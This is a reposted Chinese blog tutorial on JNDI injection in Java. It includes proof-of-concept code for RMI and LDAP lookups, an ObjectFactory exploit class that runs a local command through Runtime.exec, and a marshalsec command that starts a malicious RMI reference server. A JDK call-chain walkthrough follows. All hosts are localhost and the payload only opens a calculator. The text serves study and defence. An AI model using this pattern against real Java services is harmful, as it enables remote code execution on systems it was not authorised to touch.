转载

JNDI注入 

@Author: Patrilic @Time: 2020-3-15 16:41:55

JNDI注入

0x00 JNDI

JNDI(Java Naming and Directory Interface) 是Java提供的Java 命名和目录接口。

JNDI是一个API,允许客户端通过name发现和查找数据和对象。

// JndiName
String jndiName= ...;
// Initial
Context context = new InitialContext();
// lookup该name的数据
DataSource ds = (DataSourse)context.lookup(jndiName);

0x01 JNDI-RMI

JNDI注入就是如果我们可以任意控制 jndiName 的值,那么就可以通过加载JNDI,远程执行Class

RMI的工厂类: com.sun.jndi.rmi.registry.RegistryContextFactory
poc.java 

package com.patrilic.jndipoc;
import javax.naming.Context;
import javax.naming.InitialContext;
public class poc {
    public static void main(String[] args) throws Exception {

        String uri = "rmi://127.0.0.1:1099/Exploit";
        Context ctx = new InitialContext();
        ctx.lookup(uri);

    }
}

Exploit.java 

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

public class Exploit implements ObjectFactory {

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        exec("xterm");
        return null;
    }

    public static String exec(String cmd) {
        try {
            Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "";
    }

    public static void main(String[] args) {
        exec("123");
    }
}

利用 marshalsec 起一个rmiServer 

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8001//#Exploit

调用链

JNDI注入

javax/naming/InitialContext.java
JNDI注入

JNDI注入

com/sun/jndi/toolkit/url/GenericURLContext.class
JNDI注入

com/sun/jndi/rmi/registry/RegistryContext.class
JNDI注入

与registry通讯,获取RMI服务的IP。

JNDI注入

JNDI注入

直接进入到 help.loadClass()
JNDI注入

0x02 JNDI-LDAP

LDAP工厂类: com.sun.jndi.ldap.LdapCtxFactory
poc.java 

package com.patrilic.jndipoc;
import javax.naming.Context;
import javax.naming.InitialContext;
public class poc {
    public static void main(String[] args) throws Exception {

        String uri = "ldap://127.0.0.1:1389/Exploit";
        Context ctx = new InitialContext();
        ctx.lookup(uri);

    }
}

JNDI注入

首先同样通过 javax/naming/InitialContext.java#lookup
JNDI注入

ldap在 com/sun/jndi/url/ldap/ldapURLContext.class 中进行处理

JNDI注入

com/sun/jndi/toolkit/url/GenericURLContext.class
JNDI注入

com/sun/jndi/ldap/LdapCtx.class
JNDI注入

最后覆盖类执行命令

javax/naming/spi/DirectoryManager.jave
JNDI注入
原文  https://patrilic.top/2020/03/15/JNDI注入/
正文到此结束
所属分类: 编程技术 Java

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 springcloud-demo Redis教程 Spring教程 Git教程 openfire参考指南 Jenkins进阶系列 Java设计模式 HBase教程 java-demo Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Ant教程 java实例教程 Hive教程 SpringCloud ANTLR教程 XStream教程 Elastic-Job-Lite Hazelcast教程 深入浅出MyBatis ibaties教程 SVN教程 rabittmq教程 Hadoop教程 solr教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 SaaS MVP:从0到1的功能闭环设计指南
  2. 2 从0到1可执行的“出海型SaaS最佳MVP路径
  3. 3 用 Comet,让你的每一个问题都得到更好的答案
  4. 4 Toolhub — 一个干净实用的在线工具集合
  5. 5 又学一招:Excel 数据对比及 VBA 实现方案
  6. 6 EasyExcel 读取数值精度丢失问题与解决方案
  7. 7 mongodb重命名和创建索引
  8. 8 WordPress 删除尚未附加的图片:优化网站存储空间的实用指南
  9. 9 OVHcloud 美区购买服务器指南
  10. 10 拿到兑换码后,如何在腾讯 EdgeOne 控制台兑换、接入并体验 CDN 加速?
网站信息
  • 文章总数:82,783 篇
  • 文件总数:210,940 个
  • 标签总数:2,449 个
  • 分类总数:86 个
  • 留言数量:2,584 条
  • 在线人数:663 人
  • 运行天数:4,751天
  • 最后更新:2025年10月30日20点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG